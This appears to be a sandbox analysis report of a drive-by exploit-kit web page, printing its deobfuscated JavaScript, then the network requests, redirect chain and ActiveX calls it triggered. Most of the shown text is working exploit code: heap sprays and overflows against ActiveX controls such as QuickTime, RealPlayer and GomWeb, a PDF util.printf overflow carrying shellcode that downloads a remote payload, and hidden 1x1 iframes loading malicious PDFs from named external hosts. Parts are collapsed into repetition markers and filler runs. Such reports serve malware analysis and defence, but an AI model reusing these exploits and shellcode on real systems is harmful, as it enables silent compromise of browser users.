      while (buf.length < 600)buf += "\x0c\x0c\x0c\x0c";
      obj.IEStartNative(buf);
    }
  }
  catch (e){
  }
  return 0;
}
function ca(){
  try {
    var obj = null;
    obj = cobj("{BF6EFFF3-4558-4C4C-ADAF-A87891C5F3A3}");
    if (obj.AddColumn){
      ms();
      var buf = addr(0x0c0c0c0c);
      while (buf.length < 128)buf += buf;
      buf = buf.substring(0, 128);
      obj.AddColumn(buf, 1);
    }
  }
  catch (e){
  }
  return 0;
}
function buddy(){
  try {
    var obj = null;
    obj = cobj("Sb.SuperBuddy");
    if (obj){
      ms();
      obj.LinkSBIcons(0x0c0c0c0c);
    }
  }
  catch (e){
  }
  return 0;
}
function gomweb(){
  try {
    var obj = null;
    obj = cobj("GomWebCtrl.GomManager.1");
    if (obj){
      ms();
      var buf = "AAAA";
      while (buf.length < 506)buf += buf;
      buf = buf.substring(0, 506);
      buf += addr(0x0c0c0c0c);
      obj.OpenURL(buf);
    }
  }
  catch (e){
  }
  return 0;
}
function xmlcore(){
  try {
    var xml = null;
    var xml = cobj("Msxml2.XMLHTTP.6.0");
    if (xml){
      xml = cobj("Msxml2.XMLHTTP.4.0");
    }
    if (!xml)return 0;
    var obj = null;
    obj = cobj("{88d969c5-f192-11d4-a65f-0040963251e5}");
    obj = obj.objectif (obj){
      ms();
      try {
        obj.open(new Array(), new Array(), new Array(), new Array(), new Array());
      }
      catch (e){
      }
      ;
      obj.open(new Object(), new Object(), new Object(), new Object(), new Object());
      obj.setRequestHeader(new Object(), "...");
      obj.setRequestHeader(new Object(), 0x1016660);
      obj.setRequestHeader(new Object(), 0x1016660);
      obj.setRequestHeader(new Object(), 0x1016660);
      obj.setRequestHeader(new Object(), 0x1016660);
      obj.setRequestHeader(new Object(), 0x1016660);
      obj.setRequestHeader(new Object(), 0x1016660);
      obj.setRequestHeader(new Object(), 0x1016660);
      obj.setRequestHeader(new Object(), 0x1016660);
      obj.setRequestHeader(new Object(), 0x1016660);
      obj.setRequestHeader(new Object(), 0x1016660);
      obj.setRequestHeader(new Object(), 0x1016660);
      obj.setRequestHeader(new Object(), 0x1016660);
      obj.setRequestHeader(new Object(), 0x1016660);
      obj.setRequestHeader(new Object(), 0x1016660);
      obj.setRequestHeader(new Object(), 0x1016660);
      obj.setRequestHeader(new Object(), 0x1016660);
      obj.setRequestHeader(new Object(), 0x1016660);
      obj.setRequestHeader(new Object(), 0x1016660);
    }
  }
  catch (e){
  }
  return 0;
}
function quick(){
  try {
    var obj = null;
    obj = cobj("QuickTime.QuickTime.4");
    if (obj){
      ms();
      var buf = "";
      for (var i = 0; i < 200; i ++ ){
        buf += "AAAA";
      }
      buf += "AAA";
      for (var i = 0; i < 3; i ++ )buf += "\x0c\x0c\x0c\x0c";
      var my_div = document.createElement("div");
      my_div.innerHTML = "
<object classid=\"clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B\" width=\"200\" height=\"200\
">" + "<param name=\"src\" value=\"object_rtsp\">" + 
      "<param name=\"type\" value=\"image/x-quicktime\">" + 
      "<param name=\"autoplay\" value=\"true\">" + 
      "<param name=\"qtnext1\" value=\"<rtsp://BBBB:" + buf + ">T<myself>\">" + 
      "<param name=\"target\" value=\"myself\">" + "</object>";
      document.body.appendChild(my_div);
    }
  }
  catch (e){
  }
  return 0;
}
function real(){
  try {
    var obj = null;
    obj = cobj("IERPCtl.IERPCtl.1");
    if (obj){
      if (obj.PlayerProperty("PRODUCTVERSION") > "6.0.14.552"){
        obj = cobj("{2F542A2E-EDC9-4BF7-8CB1-87C9919F7F93}");
        ms();
        var m = "";
        var buf = addr(0x0c0c0c0c);
        while (buf.length < 32)buf += buf;
        buf = buf.substring(0, 32);
        m = obj.Console;
        obj.Console = buf;
        obj.Console = m;
        m = obj.Console;
        obj.Console = buf;
        obj.Console = m;
      }
    }
  }
  catch (e){
  }
  return 0;
}
function ntaudio(){
  try {
    var obj = null;
    obj = cobj("{77829F14-D911-40FF-A2F0-D11DB8D6D0BC}");
    if (obj){
      ms();
      var buf = addr(0x0c0c0c0c);
      while (buf.length < 5200)buf += buf;
      buf = buf.substring(0, 5200);
      obj.SetFormatLikeSample(buf);
    }
  }
  catch (e){
  }
  return 0;
}
function creative(){
  try {
    var obj = null;
    obj = cobj("{0A5FD7C5-A45C-49FC-ADB5-9952547D5715}");
    if (obj){
      ms();
      var buf = addr(0x0c0c0c0c);
      while (buf.length < 512)buf += buf;
      buf = buf.substring(0, 512);
      obj.cachefolder = buf;
    }
  }
  catch (e){
  }
  return 0;
}
function pdf(){
  try {
    var obj = null;
    obj = cobj("AcroPDF.PDF");
    if (!obj){
      obj = cobj("PDF.PdfCtrl");
    }
    if (obj){
      document.write("
<iframe src='http://afret.ru//patterns/system/pdf.php?id=5590' width=1 height=1 frameborde
r=0></iframe>");
      setTimeout('pdf2();', 10000);
    }
  }
  catch (e){
    document.write("
<iframe src='http://afret.ru//patterns/system/pdf.php?id=5590' width=1 height=1 frameborde
r=0></iframe>");
    setTimeout('pdf2();', 10000);
  }
  return 0;
}
function pdf2(){
  var obj = null;
  obj = cobj("AcroPDF.PDF");
  if (!obj){
    obj = cobj("PDF.PdfCtrl");
  }
  if (obj){
    wnd = window;
    while (wnd.parent != wnd){
      wnd = wnd.parent;
    }
    wnd.location = "http://afret.ru//patterns/system/pdf.php?id=5590&vis=1";
  }
  return 0;
}
function wme(){
  try {
    var obj = null;
    obj = cobj("{A8D3AD02-7508-4004-B2E9-AD33F087F43C}");
    if (obj){
      ms();
      var buf = addr(0x0c0c0c0c);
      while (buf.length < 2000)buf += buf;
      buf = buf.substring(0, 2000);
      obj.GetDetailsString(buf, 1);
    }
  }
  catch (e){
  }
  return 0;
}
if (office() || dl() || pdf() || wme() || ya1() || ya2() || fb() || mdss() || creative() || 
wks() || ogame() || ca() || buddy() || gomweb() || xmlcore() || quick() || real() || 
ntaudio()){
}

(repeated 1 time)

erAkIqkAepnx = Math.ceil(E71Qg1sn / FJkBTxdwozz)

(repeated 1 time)

DU8RaL2W = Math.min(E71Qg1sn, FJkBTxdwozz)

(repeated 3 times)

DfOxGkQEbzd |= (S43uCs46z3jHgD[kEavi.charCodeAt(hyz0p0t8z ++ ) - 48]) << BdU5a54

(repeated 3046 times)

vQXbMLbMSxrZOS += String["fromCharCode"](55 ^ DfOxGkQEbzd & 255)

(repeated 2284 times)

sWwtxbDQb = unescape("
%u4343%u4343%u4343%u0FEB%u335B%u66C9%u80B9%u8001%uEF33%uE243%uEBFA%uE805%uFFEC%uFFFF%u8B7F
%uDF4E%uEFEF%u64EF%uE3AF%u9F64%u42F3%u9F64%u6EE7%uEF03%uEFEB%u64EF%uB903%u6187%uE1A1%u0703
%uEF11%uEFEF%uAA66%uB9EB%u7787%u6511%u07E1%uEF1F%uEFEF%uAA66%uB9E7%uCA87%u105F%u072D%uEF0D
%uEFEF%uAA66%uB9E3%u0087%u0F21%u078F%uEF3B%uEFEF%uAA66%uB9FF%u2E87%u0A96%u0757%uEF29%uEFEF
%uAA66%uAFFB%uD76F%u9A2C%u6615%uF7AA%uE806%uEFEE%uB1EF%u9A66%u64CB%uEBAA%uEE85%u64B6%uF7BA
%u07B9%uEF64%uEFEF%u87BF%uF5D9%u9FC0%u7807%uEFEF%u66EF%uF3AA%u2A64%u2F6C%u66BF%uCFAA%u1087
%uEFEF%uBFEF%uAA64%u85FB%uB6ED%uBA64%u07F7%uEF8E%uEFEF%uAAEC%u28CF%uB3EF%uC191%u288A%uEBAF
%u8A97%uEFEF%u9A10%u64CF%uE3AA%uEE85%u64B6%uF7BA%uAF07%uEFEF%u85EF%uB7E8%uAAEC%uDCCB%uBC34
%u10BC%uCF9A%uBCBF%uAA64%u85F3%uB6EA%uBA64%u07F7%uEFCC%uEFEF%uEF85%u9A10%u64CF%uE7AA%uED85
%u64B6%uF7BA%uFF07%uEFEF%u85EF%u6410%uFFAA%uEE85%u64B6%uF7BA%uEF07%uEFEF%uAEEF%uBDB4%u0EEC
%u0EEC%u0EEC%u0EEC%u036C%uB5EB%u64BC%u0D35%uBD18%u0F10%u64BA%u6403%uE792%uB264%uB9E3%u9C64
%u64D3%uF19B%uEC97%uB91C%u9964%uECCF%uDC1C%uA626%u42AE%u2CEC%uDCB9%uE019%uFF51%u1DD5%uE79B
%u212E%uECE2%uAF1D%u1E04%u11D4%u9AB1%uB50A%u0464%uB564%uECCB%u8932%uE364%u64A4%uF3B5%u32EC
%uEB64%uEC64%uB12A%u2DB2%uEFE7%u1B07%u1011%uBA10%uA3BD%uA0A2%uEFA1%u7468%u7074%u2F3A%u612F
%u7476%u696F%u666E%u726F%u616D%u6F74%u2E72%u6E69%u6F66%u2F2F%u732F%u6168%u6C62%u6E6F%u302F
%u2D37%u3231%u312D%u2F34%u7973%u7473%u6D65%u2F2F%u6F6C%u6461%u702E%u7068%u693F%u3D64%u3635
%u3930%u7326%u6C70%u363D%u0039");
var VPJts62l6U = unescape("%u0A0A%u0A0A");
var wSg0pR = 20;
var gqTkjZmVeGvmj = wSg0pR + sWwtxbDQb.length;
while (VPJts62l6U.length < gqTkjZmVeGvmj)VPJts62l6U += VPJts62l6U;
var KFbauBg = VPJts62l6U.substring(0, gqTkjZmVeGvmj);
var ov6c91J = VPJts62l6U.substring(0, VPJts62l6U.length - gqTkjZmVeGvmj);
while (ov6c91J.length + gqTkjZmVeGvmj < 0x60000)ov6c91J = ov6c91J + ov6c91J + KFbauBg;
var qqHg0V = new Array();
for (IkVfY = 0; IkVfY < 1200; IkVfY ++ ){
  qqHg0V[IkVfY] = ov6c91J + sWwtxbDQb
}
var jZ5sJU0VRNbLDv = 
129999999999999999998888888888888888888888888888888888888888888888888888888888888888888888
888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888
888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888
88888888888888888888888888;
util.printf("%45000f", jZ5sJU0VRNbLDv);

(repeated 1 time)

NVQprxbrr1c = Math.ceil(AHKO9LXm / jPkP0QIpDLV9T)

(repeated 1 time)

BvW6QfOB = Math.min(AHKO9LXm, jPkP0QIpDLV9T)

(repeated 17 times)

AK0eLluWnTV4N |= (LkCB4u1lI[nSpjU9J.charCodeAt(TNBjIipi ++ ) - 48]) << OuPuQpj

(repeated 17096 times)

a3YzFu += lWnnZinL122(193 ^ AK0eLluWnTV4N & 255)

(repeated 12822 times)

ÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁ
ÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁ
ÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁ
ÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁ
ÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁ
ÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁ
ÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁ
ÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁ
ÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁ
ÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁ
ÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁ
ÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁ
ÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁ
ÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁ
ÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁ
ÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁ
ÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁ
ÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁ
ÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁ
ÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁ
ÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁ
ÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁ
ÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁ
ÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁ
ÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁ
ÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁ
ÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁ
ÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁ
ÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁ
ÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁ
ÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁ
ÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁ
ÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁ
ÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁ
ÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁ
ÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁ
ÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁ
ÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁ
ÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁ
ÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁ
ÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁ
ÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁ
ÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁ
ÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁ
ÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁ
ÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁ
ÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁ
ÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁ
ÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁ

(repeated 1 time)

Writes

<iframe src='http://avtoinformator.info//shablon/07-12-14/system/pdf.php?id=5609' width=1 height=1 
frameborder=0></iframe>

(repeated 1 time)

Network Activity

Requests

URL	Status	Content Type
http://erotic-adventure.com	200	text/html
about:blank	200	text/html
http://litedownloadseek.cn/in.cgi?cocacola3	302	text/html
http://avtoinformator.info/shablon/07-12-14/system/index.php	200	text/html
http://avtoinformator.info//shablon/07-12-14/system/pdf.php?id=5609	200	application/pdf
http://litetoplocatesite.cn/in.cgi?cocacola2	302	text/html
http://afret.ru/patterns/system/index.php	200	text/html
http://yourliteseek.cn/in.cgi?cocacola	302	text/html
http://avtoinformator.info//shablon/07-12-14/system/pdf.php?id=5609&vis=1	200	application/pdf
http://sagardia.com/cobro_auto/robot/system/index.php	200	text/html

Redirects

From	To
http://litedownloadseek.cn/in.cgi?cocacola3	http://avtoinformator.info/shablon/07-12-14/system/index.php
http://litetoplocatesite.cn/in.cgi?cocacola2	http://afret.ru/patterns/system/index.php
http://yourliteseek.cn/in.cgi?cocacola	http://sagardia.com/cobro_auto/robot/system/index.php

ActiveX controls

A8D3AD02-7508-4004-B2E9-AD33F087F43C
	Name	Arg0	Arg1	Count
Methods	GetDetailsString	e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c other 5904 bytes e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c	1.0	1

A8D3AD02-7508-4004-B2E9-AD33F087F43C

Name

Arg0

Arg1

Count

